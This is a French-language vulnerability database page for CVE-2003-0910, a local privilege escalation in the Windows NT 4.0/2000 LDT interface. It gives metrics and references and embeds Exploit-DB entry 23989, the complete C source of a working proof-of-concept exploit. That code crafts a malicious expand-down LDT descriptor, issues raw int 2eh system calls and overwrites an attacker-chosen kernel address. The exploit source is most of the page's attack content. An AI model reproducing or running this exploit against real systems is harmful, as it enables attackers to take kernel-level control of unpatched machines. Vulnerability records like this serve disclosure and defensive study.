CVE-2003-0910 : Détail

CVE-2003-0910

0.09%V3
Local
2004-04-16
02h00 +00:00
2018-10-12
17h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

The NtSetLdtEntries function in the programming interface for the Local Descriptor Table (LDT) in Windows NT 4.0 and Windows 2000 allows local attackers to gain access to kernel memory and execute arbitrary code via an expand-down data segment descriptor descriptor that points to protected memory.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.2 AV:L/AC:L/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 23989

Date de publication : 2004-04-17 22h00 +00:00
Auteur : mslug@safechina.net
EDB Vérifié : Yes

// source: https://www.securityfocus.com/bid/10122/info Microsoft Windows Local Descriptor Table programming interface is prone to a privilege-escalation vulnerability. A local attacker may be able to create a malicious entry in the Local Descriptor Table. This entry may point into protected memory. Since this memory space is reserved for kernel operations, the attacker will likely exploit this condition to execute arbitrary code with elevated privileges. /****************************************************************** * Windows Expand-Down Data Segment Local Privilege Escalation * [MS04-011] * * Bug found by: Derek Soeder * Author: mslug (a1476854@hotmail.com), All rights reserved. * * Version: PoC 0.1 * * Tested: Win2k pro en sp4 * * Thanks: z0mbie's article :) * * Compile: cl winldt.c * * Date: 18 Apr 2004 *******************************************************************/ #include <windows.h> #include <stdio.h> #include <string.h> #if 1 #define KernelStackPtr 0xFD000000 // #define BedSize 0x01000000 #else #define KernelStackPtr 0xF0000000 #define BedSize 0x10000000 #endif unsigned char bed[BedSize]; unsigned char pin[]="COOL"; int (*NtSetLdtEntries)(DWORD, DWORD, DWORD, DWORD, DWORD, DWORD); WORD SetupLDT(WORD seg, DWORD ldtbase); unsigned long patch_to; int main(int argc, char *argv[]) { DWORD ldtbase, KSP; int i; HMODULE hNtdll; if(argc<2) { printf("** coded by mslug@safechina.net **\n"); printf("winldt.exe <kernel address>\n"); return 0; } patch_to = strtoul(argv[1], 0, 16); hNtdll = LoadLibrary("ntdll.dll"); (DWORD*)NtSetLdtEntries = (DWORD*)GetProcAddress(hNtdll, "NtSetLdtEntries"); memset(bed, 'A', BedSize); bed[BedSize-1]=0; ldtbase = (DWORD) &bed[0] - KernelStackPtr; printf("[+] User-land bed : 0x%08X\n", &bed[0]); printf("[+] 1st LDT base : 0x%08X\n", ldtbase); SetupLDT(0x1f, ldtbase); __asm { push es push 1fh pop es mov eax, 11h //1 param lea edx, pin int 2eh pop es } for (KSP=0, i=0; i<BedSize-3; i++) { if (bed[i] =='C' && bed[i+1]=='O' && bed[i+2]=='O' && bed[i+3]=='L' ) { KSP = KernelStackPtr + i; printf("[!] Knl stack ptr : 0x%08X\n", KSP); //KSP = (DWORD)&bed[i]-ldtbase; //printf("[!] Knl stack ptr : 0x%08X\n", KSP); break; } } if(!KSP) { printf("[-] Can't locate Kernel stack pointer, try again\n"); return 0; } else if (patch_to < KSP) { printf("[-] Can only patch kernel above KSP\n"); return 0; } ldtbase = patch_to - KSP; printf("[+] Patch to : 0x%08X\n", patch_to); printf("[+] 2nd LDT base : 0x%08X\n", ldtbase); SetupLDT(0x17, ldtbase); __asm { push es push 17h pop es mov eax, 11h lea edx, pin int 2eh pop es } return 0; } WORD SetupLDT(WORD seg, DWORD ldtbase) { LDT_ENTRY EvilLdt; DWORD base = ldtbase; DWORD limit = 0; int ret; EvilLdt.BaseLow = base & 0xFFFF; EvilLdt.HighWord.Bytes.BaseMid = base >> 16; EvilLdt.HighWord.Bytes.BaseHi = base >> 24; EvilLdt.LimitLow = (limit >> 12) & 0xFFFF; EvilLdt.HighWord.Bits.LimitHi = limit >> 28; EvilLdt.HighWord.Bits.Granularity = 1; // 0/1, if 1, limit=(limit<<12)|FFF EvilLdt.HighWord.Bits.Default_Big = 1; // 0=16bit 1=32bit EvilLdt.HighWord.Bits.Reserved_0 = 0; // 0/1 EvilLdt.HighWord.Bits.Sys = 0; // 0/1 EvilLdt.HighWord.Bits.Pres = 1; // 0/1 (presence bit) EvilLdt.HighWord.Bits.Dpl = 3; // only 3 allowed :-( EvilLdt.HighWord.Bits.Type = 23; // [16..27] ret = NtSetLdtEntries( seg, *(DWORD*)&EvilLdt, *(((DWORD*)&EvilLdt)+1), 0,0,0); if (ret < 0) { printf("[-] Set ldt error : %08X.\n", ret); exit(0); } return seg; }

Products Mentioned

Configuraton 0

Microsoft>>Windows_2000 >> Version *

Microsoft>>Windows_nt >> Version 4.0

Références

http://www.ciac.org/ciac/bulletins/o-114.shtml
Tags : third-party-advisory, government-resource, x_refsource_CIAC
http://www.eeye.com/html/Research/Advisories/AD20040413D.html
Tags : third-party-advisory, x_refsource_EEYE
http://www.us-cert.gov/cas/techalerts/TA04-104A.html
Tags : third-party-advisory, x_refsource_CERT
http://www.securityfocus.com/bid/10122
Tags : vdb-entry, x_refsource_BID
http://www.kb.cert.org/vuls/id/122076
Tags : third-party-advisory, x_refsource_CERT-VN